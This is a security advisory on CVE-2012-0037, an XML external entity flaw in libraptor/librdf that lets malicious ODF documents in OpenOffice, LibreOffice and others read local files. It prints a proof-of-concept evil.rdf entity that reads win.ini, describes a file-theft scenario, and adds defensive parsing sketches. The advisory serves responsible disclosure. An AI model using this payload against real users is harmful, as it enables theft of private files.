libraptor - XXE in RDF/XML File Interpretation
| Application | libraptor / librdf (versions 1.x and 2.x) |
| Also Affected | OpenOffice 3.x, LibreOffice 3.x, AbiWord, KOffice |
| Discovered by | Timothy D. Morgan <tmorgan (a) vsecurity.com> |
| Vendor Status | Patches available; major downstream vendors and operating system distributions notified |
"Raptor is a free software / Open Source C library that provides a set of parsers and serializers that generate Resource Description Framework (RDF) triples by parsing syntaxes or serialize the triples into a syntax. The supported parsing syntaxes are RDF/XML, N-Quads, N-Triples, TRiG, Turtle, RSS tag soup including all versions of RSS, Atom 1.0 and 0.3, GRDDL and microformats for HTML, XHTML and XML and RDFa. The serializing syntaxes are RDF/XML (regular, and abbreviated), Atom 1.0, GraphViz, JSON, N-Quads, N-Triples, RSS 1.0 and XMP." -- libraptor web site 
In December 2011, VSR identified a vulnerability in multiple open source office products (including OpenOffice, LibreOffice, KOffice, and AbiWord) due to unsafe interpretation of XML files with custom entity declarations. Deeper analysis revealed that the vulnerability was caused by acceptance of external entities by the libraptor library, which is used by librdf and is in turn used by these office products.
In the context of office applications, these vulnerabilities could allow for XML External Entity (XXE) attacks resulting in file theft and a loss of user privacy when opening potentially malicious ODF documents. For other applications which depend on librdf or libraptor, potentially serious consequences could result from accepting RDF/XML content from untrusted sources, though the impact may vary widely depending on the context.
Open Document Format (ODF) files consist of a collection of several different
files stored in a ZIP archive. Included in this set is a "manifest.rdf" file
which is formatted according to the RDF/XML representation. The RDF format is
intended to be used for storing metadata associated with specific document
elements. The manifest.rdf file can reference secondary RDF files within the
ODF file as well as external document schemas.
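As a rough illustration of this layout, the following Python sketch lists the RDF members of an ODF archive using only the standard library. The function name `list_rdf_members` is hypothetical, and selecting members by their ".rdf" suffix is an assumption made for brevity; a stricter tool would follow the references from manifest.rdf instead.

```python
import zipfile


def list_rdf_members(odf_file):
    """Return the names of archive members that look like RDF files.

    `odf_file` may be a path or a binary file-like object. Matching on
    the ".rdf" suffix is a simplification (an assumption of this sketch).
    """
    with zipfile.ZipFile(odf_file) as archive:
        return sorted(
            name for name in archive.namelist()
            if name.lower().endswith(".rdf")
        )
```

For a document such as the test sample described in this advisory, the result would be expected to include both manifest.rdf and any secondary RDF file it references.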
The RDF file parser (librdf) used by the affected office products accepts DTD declarations within the RDF files themselves. In addition, the parser resolves external entities, which may reference arbitrary local files as well as HTTP and FTP resources.
For instance, the following "evil.rdf" file was created within a valid ODF text
document (.odt file) and was referenced by the internal manifest.rdf file:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE rdf [
  <!ENTITY file SYSTEM "file:///c:/windows/win.ini">
]>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
  <rdf:Description rdf:about="content.xml#id1265690860">
    <ns0:comment xmlns:ns0="http://www.w3.org/2000/01/rdf-schema#">&file;</ns0:comment>
  </rdf:Description>
</rdf:RDF>
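A file like this can be inspected without resolving anything it references. The sketch below, an illustration only, uses Python's standard `xml.parsers.expat` module to report external entity declarations found in the document prolog and stops before any element content is processed. The names `external_entity_declarations` and `_PrologDone` are hypothetical, and this is not a description of how libraptor or libxml2 handle the DTD internally.

```python
import xml.parsers.expat


class _PrologDone(Exception):
    """Raised internally to stop parsing once the root element starts."""


def external_entity_declarations(xml_bytes):
    """Return [(entity_name, system_id), ...] for external entities.

    Only the prolog (XML declaration and DTD internal subset) is read;
    parsing is aborted at the first start tag, so no entity reference
    in the document body is ever expanded or fetched.
    """
    found = []
    parser = xml.parsers.expat.ParserCreate()

    def on_entity_decl(name, is_parameter, value, base,
                       system_id, public_id, notation):
        # External entities have no inline value, only an identifier.
        if value is None:
            found.append((name, system_id))

    def on_start_element(name, attrs):
        raise _PrologDone()

    parser.EntityDeclHandler = on_entity_decl
    parser.StartElementHandler = on_start_element
    try:
        parser.Parse(xml_bytes, True)
    except _PrologDone:
        pass
    return found
```

Applied to the sample above, the function would report the single entity named "file" together with its file:// system identifier. Internal entities, which carry an inline value, are not reported.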
Upon opening the malicious .odt file in OpenOffice for Windows, the
c:\windows\win.ini file was read and included in the document metadata. Upon
saving the document, this metadata was included literally in the resulting
evil.rdf file (within the .odt file):
<?xml version="1.0" encoding="utf-8"?>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
  <rdf:Description rdf:about="content.xml#id1265690860">
    <ns1:comment xmlns:ns1="http://www.w3.org/2000/01/rdf-schema#">; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
CMCDLLNAME32=mapi32.dll
CMC=1
MAPIX=1
MAPIXVER=1.0.0.1
OLEMessaging=1
</ns1:comment>
  </rdf:Description>
</rdf:RDF>
The malicious XML entities could also include URLs to attacker-controlled HTTP or FTP resources. This would allow an attacker to determine when a document was opened, potentially resulting in reduced privacy. However, based on current analysis of the affected office applications, the most serious attack scenario is likely to be:
- Attacker posts a malicious file on a web site or sends the file to the victim. The file contains a form for the victim to fill out and return to the attacker.
- Victim fills out the form, saves it, and sends it back to the attacker.
- Attacker is able to read the contents of any stolen files as embedded metadata, simply by unzipping the returned file and reading the malicious RDF component.
This attack clearly requires some significant user interaction. However, other applications which rely on librdf/libraptor have not been analyzed. It is plausible that the context of the external entity interpretation in other software could allow for more serious automated file retrieval attacks.
The 1.x and 2.x major versions of librdf are affected.
Thus far, all recent versions of open source office products appear to be affected, since these products rely on librdf/raptor for the interpretation of RDF files. This, in turn, relies on libxml2, which supports external entity interpretation by default. OpenOffice and LibreOffice include a modified copy of librdf 1.x which was vulnerable at the time of testing. It is likely that all previously released 3.x versions of OpenOffice and LibreOffice are vulnerable. AbiWord and KOffice rely on a copy of librdf which is installed by the underlying operating system.
Numerous other open source software packages depend on librdf or libraptor (including ardour, libslv2, lv2file, morla, soprano, and various language-specific wrappers), but it is not known whether these are exploitable in any realistic scenario.
The following timeline provides an overview of communication with the primary affected vendors:
| 2012-01-09 | OpenOffice, LibreOffice, AbiWord, KOffice, and libraptor maintainers were provided a draft advisory and test sample. The OpenWall "distros" mailing list was also notified. Apache OpenOffice Security team acknowledged notification. libraptor developer confirmed flaw. |
| 2012-01-10 | CVE-2012-0037 assigned by Apache. |
| 2012-02-02 | Notified OpenWall "distros" mailing list again, due to previous technical problems. |
| 2012-02-04 | libraptor developer provided patches to all notified parties. |
| 2012-02-22 | Extensive arguing between vendors about embargo/release date. |
| 2012-03-06 | More arguing about release date. |
| 2012-03-14 | Agreed upon release date established. |
| 2012-03-22 | Security updates and vendor advisories released. |
| 2012-03-24 | VSR advisory released. |
Users of most open source operating system distributions should update to the latest librdf package as soon as possible, once a patched version is available for their distribution. OpenOffice and LibreOffice packages should also be upgraded, since these include a custom copy of the library.
Users of other operating systems who use LibreOffice or OpenOffice should upgrade these packages to the latest release versions as soon as possible.
Developers of software which relies on librdf or libraptor should assess the risk of XXE attacks on interpreted XML files and take appropriate actions to notify their users based on how their software operates. VSR would be happy to assist developers in these efforts on a case-by-case basis.
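As one way to reason about this risk, the sketch below shows the general mitigation pattern of parsing XML with external entity resolution explicitly disabled. It uses Python's standard `xml.sax` module purely for illustration and does not reflect the libraptor patch or the libxml2 API. The names `text_without_external_entities` and `_TextCollector` are hypothetical.

```python
import io
import xml.sax
from xml.sax.handler import (
    ContentHandler,
    feature_external_ges,
    feature_external_pes,
)


class _TextCollector(ContentHandler):
    """Accumulates all character data reported by the parser."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def text_without_external_entities(xml_bytes):
    """Parse XML and return its character data.

    External general and parameter entities are switched off, so a
    reference such as &file; contributes no text and triggers no file
    or network access.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)
    parser.setFeature(feature_external_pes, False)
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.chunks)
```

Setting the features explicitly, rather than relying on library defaults, keeps the behavior the same across library versions whose defaults may differ. Applications that never need a DTD in their input may prefer to reject any document containing one.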
Common Vulnerabilities and Exposures (CVE) Information
The Common Vulnerabilities and Exposures (CVE) project has assigned the number CVE-2012-0037 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.
Thanks to Leper for help in preliminary testing.
Thanks to Jan iankko Lieskovsky, Daniel Veillard, Caolán McNamara, and Michael Stahl for performing deeper analysis on the interaction between libraptor and libxml2.
This advisory is distributed for educational purposes only with the sincere hope that it will help promote public safety. This advisory comes with absolutely NO WARRANTY; not even the implied warranty of merchantability or fitness for a particular purpose. Neither Virtual Security Research, LLC nor the author accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
See the VSR disclosure policy for more information on our responsible disclosure practices.